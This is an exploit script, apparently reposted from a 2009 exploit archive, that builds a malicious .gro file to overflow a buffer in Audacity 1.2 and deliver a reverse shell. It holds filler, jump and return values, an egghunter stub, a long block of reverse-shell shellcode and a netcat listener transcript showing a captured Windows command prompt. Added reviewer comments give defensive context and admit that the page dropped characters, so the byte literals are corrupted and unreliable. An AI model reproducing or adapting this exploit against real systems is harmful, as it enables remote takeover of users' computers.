
audacity12-overflow.txt

Posted on 25 August 2009

#!/usr/bin/env python
#
# Audacity <= 1.2 .gro universal buffer overflow exploit
# Author: mr_me
# Download: http://audacity.sourceforge.net/download/
# Tested on Wind0ws XP sp3 & Vist@
#
# Greetz fly to Muts and the offensive-security team
# also to my wonderful partner Vanessa F for putting up with me :P
# http://www.offensive-security.com/information-security-training.php
#
# Original: www.milw0rm.com/exploits/7634
#################################################
#
# samurai@mrme:~$ nc -lvp 4444
# listening on [any] 4444 ...
# 192.168.2.3: inverse host lookup failed: Unknown server error :
# Connection timed out
# connect to [192.168.2.3] from (UNKNOWN) [192.168.2.3] 55164
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:Program FilesAudacity>
#
# ---------------------------------------------------------------------------
# Reviewer notes (defensive reading of this listing)
#
# What the script does: it concatenates a sequence of string literals into
# `buff` and writes the result to a file named mr_mes_eviL.gro. Per the header
# above, opening that file in Audacity <= 1.2 overflows a buffer. The script
# itself never touches the network or the target application; it only
# produces the file. It uses the Python 2 `print` statement.
#
# Fidelity caveat: the page this listing was taken from collapsed the script
# onto a few lines and dropped characters (the Windows path in the transcript
# above has lost its separators as well). The string literals below are kept
# exactly as the page shows them, so they do not represent the author's
# original byte values.
#
# Exposure: the header names Audacity <= 1.2 on Windows XP SP3 and Vista as
# tested targets. The trigger is a user opening a crafted .gro file, so the
# practical controls are running a maintained Audacity release and treating
# .gro files from untrusted sources as untrusted input. OS-level mitigations
# such as DEP and ASLR raise the cost of this class of overflow in general;
# whether they stop this particular sample is not shown here.
#
# Detection hints grounded in this listing:
#   * The transcript above shows a Windows command prompt delivered over a TCP
#     connection to a listener on port 4444. An audio editor spawning a
#     command interpreter or opening an outbound connection is anomalous and
#     worth alerting on regardless of port.
#   * The output filename (mr_mes_eviL.gro) and the ASCII marker W00TW00T are
#     sample-specific artifacts. Both are trivial to change, so treat them as
#     signatures for this sample only, not for the vulnerability.
# ---------------------------------------------------------------------------

print " [+] Creating eviL .gro file..."

# Filler: one literal repeated 174 times, placed ahead of the control values.
# NOTE(review): 174 is presumably the distance to the overwritten data in the
# vulnerable parser -- the listing does not show how it was derived.
buff = ("x44" * 174)

# Two four-byte values follow the filler.
# NOTE(review): these look like a short jump followed by an address inside the
# target process (inferred from their position after the filler; confirm
# against the original advisory).
buff += ("xEBx08x90x90")
buff += ("x22x23x17x01")

# Four filler bytes between the control values and the first code stub.
buff += "x90"* 4

# First-stage stub. The author's comment marks the middle literal as "the
# egg"; its values are the ASCII codes for W00T, the same four characters
# that appear doubled as the marker further down.
buff += ("x66x81xCAxFFx0Fx42x52x6Ax02x58xCDx2Ex3Cx05x5Ax74xEFxB8"
"x57x30x30x54" # this is the egg... 
"x8BxFAxAFx75xEAxAFx75xE7xFFxE7")

# 1000 repetitions of a second filler value separating the stub from the
# marker and the payload.
buff += ("xCC" * 1000);

# Marker placed immediately before the second-stage payload.
buff += "W00TW00T"

# Reverse shellcode to 192.168.2.3 change as you see fit (2000 bytes for space)
# Reviewer note: 192.168.2.3 is an RFC 1918 private address from the author's
# lab; it matches the listener address in the transcript above.
buff += ("x89xe5xd9xc3xd9x75xf4x5fx57x59x49x49x49x49x49"
"x49x49x49x49x49x43x43x43x43x43x43x37x51x5ax6a"
"x41x58x50x30x41x30x41x6bx41x41x51x32x41x42x32"
"x42x42x30x42x42x41x42x58x50x38x41x42x75x4ax49"
"x4bx4cx43x5ax4ax4bx50x4dx4bx58x4bx49x4bx4fx4b"
"x4fx4bx4fx45x30x4cx4bx42x4cx46x44x47x54x4cx4b"
"x47x35x47x4cx4cx4bx43x4cx45x55x44x38x45x51x4a"
"x4fx4cx4bx50x4fx44x58x4cx4bx51x4fx47x50x45x51"
"x4ax4bx50x49x4cx4bx50x34x4cx4bx43x31x4ax4ex50"
"x31x49x50x4dx49x4ex4cx4dx54x49x50x44x34x44x47"
"x49x51x49x5ax44x4dx43x31x49x52x4ax4bx4bx44x47"
"x4bx50x54x47x54x46x48x44x35x4bx55x4cx4bx51x4f"
"x51x34x45x51x4ax4bx42x46x4cx4bx44x4cx50x4bx4c"
"x4bx51x4fx45x4cx43x31x4ax4bx45x53x46x4cx4cx4b"
"x4dx59x42x4cx51x34x45x4cx45x31x49x53x46x51x49"
"x4bx45x34x4cx4bx47x33x50x30x4cx4bx51x50x44x4c"
"x4cx4bx44x30x45x4cx4ex4dx4cx4bx51x50x45x58x51"
"x4ex42x48x4cx4ex50x4ex44x4ex4ax4cx46x30x4bx4f"
"x4ex36x43x56x50x53x45x36x42x48x46x53x50x32x45"
"x38x43x47x44x33x46x52x51x4fx51x44x4bx4fx48x50"
"x42x48x48x4bx4ax4dx4bx4cx47x4bx50x50x4bx4fx4e"
"x36x51x4fx4cx49x4ax45x45x36x4bx31x4ax4dx44x48"
"x45x52x46x35x42x4ax44x42x4bx4fx48x50x45x38x4e"
"x39x45x59x4cx35x4ex4dx51x47x4bx4fx49x46x46x33"
"x51x43x51x43x51x43x50x43x51x43x47x33x51x43x4b"
"x4fx4ex30x42x48x49x50x49x38x45x52x45x53x42x46"
"x42x48x44x51x51x4cx43x56x50x53x4bx39x4dx31x4d"
"x45x43x58x4ax4cx4cx39x4ex4ax43x50x51x47x4bx4f"
"x4ex36x42x4ax42x30x46x31x46x35x4bx4fx48x50x42"
"x46x43x5ax42x44x43x56x42x48x45x33x42x4dx42x4a"
"x46x30x50x59x46x49x48x4cx4bx39x4ax47x43x5ax47"
"x34x4dx59x4bx52x50x31x49x50x4ax53x4ex4ax4ax35"
"x4dx59x4bx4dx4bx4ex50x42x46x4dx4bx4ex50x42x46"
"x4cx4cx4dx42x5ax47x48x4ex4bx4ex4bx4ex4bx45x38"
"x42x52x4bx4ex48x33x42x36x4bx4fx42x55x47x58x4b"
"x4fx49x46x51x4bx51x47x51x42x46x31x50x51x46x31"
"x42x4ax43x31x50x51x50x51x51x45x50x51x4bx4fx4e"
"x30x42x48x4ex4dx4ex39x43x35x48x4ex51x43x4bx4f"
"x48x56x42x4ax4bx4fx4bx4fx47x47x4bx4fx4ex30x42"
"x48x4dx37x43x49x48x46x43x49x4bx4fx42x55x44x44"
"x4bx4fx49x46x4bx4fx43x47x4bx4cx4bx4fx4ex30x43"
"x58x4ax50x4cx4ax45x54x51x4fx50x53x4bx4fx4ex36"
"x4bx4fx48x50x44x4ax41x41")

# Write the assembled buffer to mr_mes_eviL.gro in the current directory and
# report completion. The file is opened in text mode ('w') and closed
# explicitly; `file` shadows the Python 2 builtin of the same name.
file = open('mr_mes_eviL.gro','w'); file.write(buff); file.close(); print " [+] mr_mes_eviL.gro File created successfully. :)"

 
